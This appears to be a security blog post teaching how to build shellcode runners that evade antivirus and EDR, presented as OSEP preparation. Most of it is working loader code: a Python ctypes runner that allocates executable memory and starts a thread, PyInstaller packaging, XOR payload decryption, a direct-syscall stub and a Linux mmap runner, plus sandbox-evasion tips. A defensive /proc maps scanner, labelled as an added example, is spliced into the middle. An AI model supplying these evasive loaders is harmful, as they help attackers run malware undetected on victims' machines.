
Creating undetected shellcode runners is a critical skill for penetration testers, especially when preparing for advanced certifications like OSEP. These techniques help evade antivirus (AV) and endpoint detection and response (EDR) solutions, proving that security tools alone aren’t foolproof.
You Should Know:
1. Python Shellcode Runner & Compilation
A simple Python script can generate and compile shellcode into an undetected executable. Below is an example:
```python
import ctypes
import sys
import os

# Replace with your shellcode (e.g., generated via msfvenom)
shellcode = bytearray(b"\x90\x90\x90...")

# Allocate memory with execute permissions
ptr = ctypes.windll.kernel32.VirtualAlloc(
    ctypes.c_int(0),
    ctypes.c_int(len(shellcode)),
    ctypes.c_int(0x3000),  # MEM_COMMIT | MEM_RESERVE
    ctypes.c_int(0x40)     # PAGE_EXECUTE_READWRITE
)

# Copy shellcode into memory
buf = (ctypes.c_char * len(shellcode)).from_buffer(shellcode)
ctypes.windll.kernel32.RtlMoveMemory(
    ctypes.c_int(ptr),
    buf,
    ctypes.c_int(len(shellcode))
)

# Execute shellcode
ht = ctypes.windll.kernel32.CreateThread(
    ctypes.c_int(0),
    ctypes.c_int(0),
    ctypes.c_int(ptr),
    ctypes.c_int(0),
    ctypes.c_int(0),
    ctypes.pointer(ctypes.c_int(0))
)

# Wait for thread to finish
ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(ht), ctypes.c_int(-1))
```
Compile it into an EXE using PyInstaller:
```bash
pyinstaller --onefile --noconsole shellcode_runner.py
```
2. Obfuscation Techniques
To evade static detection:
- Encrypt shellcode (AES, XOR) and decrypt at runtime.
- Code splitting – Break payload into chunks and reassemble in memory.
- API unhooking – Bypass EDR hooks by calling syscalls directly.
Example XOR decryption in C:
```c
#include <stddef.h>

/* XOR the buffer in place with a repeating key. */
void XOR(char *data, size_t data_len, char *key, size_t key_len) {
    for (size_t i = 0; i < data_len; i++) {
        data[i] ^= key[i % key_len];
    }
}
```
3. Static & Dynamic Evasion Checks
- Static Analysis Evasion:
  - Use UPX packing (though some EDRs flag it).
  - Strip debug symbols (`strip` command in Linux).
- Dynamic Analysis Evasion:
  - Check for sandbox artifacts (e.g., VM detection).
  - Sleep-based evasion (`Sleep(60000)` before execution).
4. Syscalls for Direct EDR Bypass
Instead of `VirtualAlloc`, use direct syscalls (Windows):
```c
__declspec(naked) NTSTATUS NtAllocateVirtualMemory(
    HANDLE ProcessHandle,
    PVOID *BaseAddress,
    ULONG_PTR ZeroBits,
    PSIZE_T RegionSize,
    ULONG AllocationType,
    ULONG Protect) {
    __asm {
        mov r10, rcx
        mov eax, 0x18   // Syscall ID for NtAllocateVirtualMemory
        syscall
        ret
    }
}
```
5. Linux Shellcode Execution
For Linux-based payloads:
```c
#include <sys/mman.h>
#include <string.h>
#include <unistd.h>

int main() {
    unsigned char shellcode[] = "\x90\x90\x90...";

    /* Map an anonymous, private RWX region and copy the payload into it. */
    void *exec = mmap(0, sizeof(shellcode), PROT_READ | PROT_WRITE | PROT_EXEC,
                      MAP_ANONYMOUS | MAP_PRIVATE, -1, 0);
    memcpy(exec, shellcode, sizeof(shellcode));

    /* Jump into the mapped region. */
    ((void (*)())exec)();
    return 0;
}
```
Compile with:
```bash
gcc -fno-stack-protector -z execstack shellcode_runner.c -o runner
```
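From the defender's side, both artifacts of the Linux runner above are visible in `/proc/<pid>/maps`: the `mmap` call leaves an anonymous private `rwxp` region, and `-z execstack` marks the `[stack]` mapping executable. The scanner below is an added example, not code from the original post; it parses maps-format text (a constructed sample is embedded, and `scan_process` reads a live process on Linux) and flags both patterns.

```python
import re
from typing import List, Tuple

# /proc/<pid>/maps line format: "start-end perms offset dev inode [path]"
_MAPS_RE = re.compile(
    r"^(?P<start>[0-9a-f]+)-(?P<end>[0-9a-f]+)\s+(?P<perms>[rwxps-]{4})\s+"
    r"(?P<offset>[0-9a-f]+)\s+(?P<dev>[0-9a-f]+:[0-9a-f]+)\s+(?P<inode>\d+)\s*(?P<path>.*)$"
)

def suspicious_mappings(maps_text: str) -> List[Tuple[str, str, str]]:
    """Return (range, perms, label) for regions a shellcode runner typically creates:
    anonymous private RWX pages (mmap with PROT_READ|PROT_WRITE|PROT_EXEC) and an executable stack."""
    hits = []
    for line in maps_text.splitlines():
        m = _MAPS_RE.match(line.strip())
        if not m:
            continue
        perms, path = m.group("perms"), m.group("path").strip()
        rng = f"{m.group('start')}-{m.group('end')}"
        anonymous = m.group("inode") == "0" and not path.startswith("/")
        if perms.startswith("rwx") and anonymous and path != "[stack]":
            hits.append((rng, perms, "anonymous RWX region"))
        elif path == "[stack]" and "x" in perms:
            hits.append((rng, perms, "executable stack"))
    return hits

def scan_process(pid: int) -> List[Tuple[str, str, str]]:
    """Read a live process's maps (Linux only; needs read access to /proc/<pid>/maps)."""
    with open(f"/proc/{pid}/maps") as f:
        return suspicious_mappings(f.read())

# Constructed sample resembling the runner above: one RWX mmap'd page plus an executable stack.
SAMPLE_MAPS = """\
55d1c2e00000-55d1c2e01000 r--p 00000000 fd:01 1311 /home/user/runner
55d1c2e01000-55d1c2e02000 r-xp 00001000 fd:01 1311 /home/user/runner
7f3a1c000000-7f3a1c001000 rwxp 00000000 00:00 0
7f3a1c200000-7f3a1c3c0000 r-xp 00000000 fd:01 2222 /usr/lib/x86_64-linux-gnu/libc.so.6
7ffd4a000000-7ffd4a021000 rwxp 00000000 00:00 0 [stack]
7ffd4a1f0000-7ffd4a1f2000 r-xp 00000000 00:00 0 [vdso]
"""

if __name__ == "__main__":
    for rng, perms, label in suspicious_mappings(SAMPLE_MAPS):
        print(f"{rng} {perms} {label}")
```

Run it against every `/proc/*/maps` on a host to baseline which processes legitimately hold RWX anonymous pages (JIT runtimes do), then alert on new ones.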
What Undercode Say
Modern AV/EDR solutions are not infallible. A combination of obfuscation, direct syscalls, and dynamic execution can bypass most defenses. Purple teaming—where offensive techniques inform defensive improvements—is crucial for robust security.
Expected Output:
A functional, undetected shellcode runner that evades static and dynamic analysis while executing payloads in memory.
Reported By: Activity 7321663888918286336 – Hackers Feeds